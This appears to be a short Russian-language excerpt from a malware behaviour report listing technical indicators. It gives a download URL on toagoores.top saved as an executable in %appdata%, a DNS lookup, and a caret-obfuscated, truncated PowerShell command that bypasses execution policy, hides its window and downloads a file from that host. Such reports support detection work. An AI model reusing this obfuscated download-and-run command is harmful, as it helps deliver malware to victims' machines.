Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OWeRS^He^LL^.eXe^ -ExEC^u^ti^onpOLi^CY byPAsS -^n^O^prO^fIL^E -^WIn^DOWS^TYLe h^IDde^n^ (n^ew^-oBject^ S^ys^tem^.NE^t^.web^Cl^Ie^NT).^dO^wNLOADFi^LE('http://toagoores.top/...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "P^OWeRS^He^LL^.eXe^ -ExEC^u^ti^onpOLi^CY byPAsS -^n^O^prO^fIL^E -^WIn^DOWS^TYLe h^IDde^n^ (n^ew^-oBject^ S^ys^tem^.NE^t^.web^Cl^Ie^NT).^dO^wNLOADFi^LE('http://toagoores.top/...' (со скрытым окном)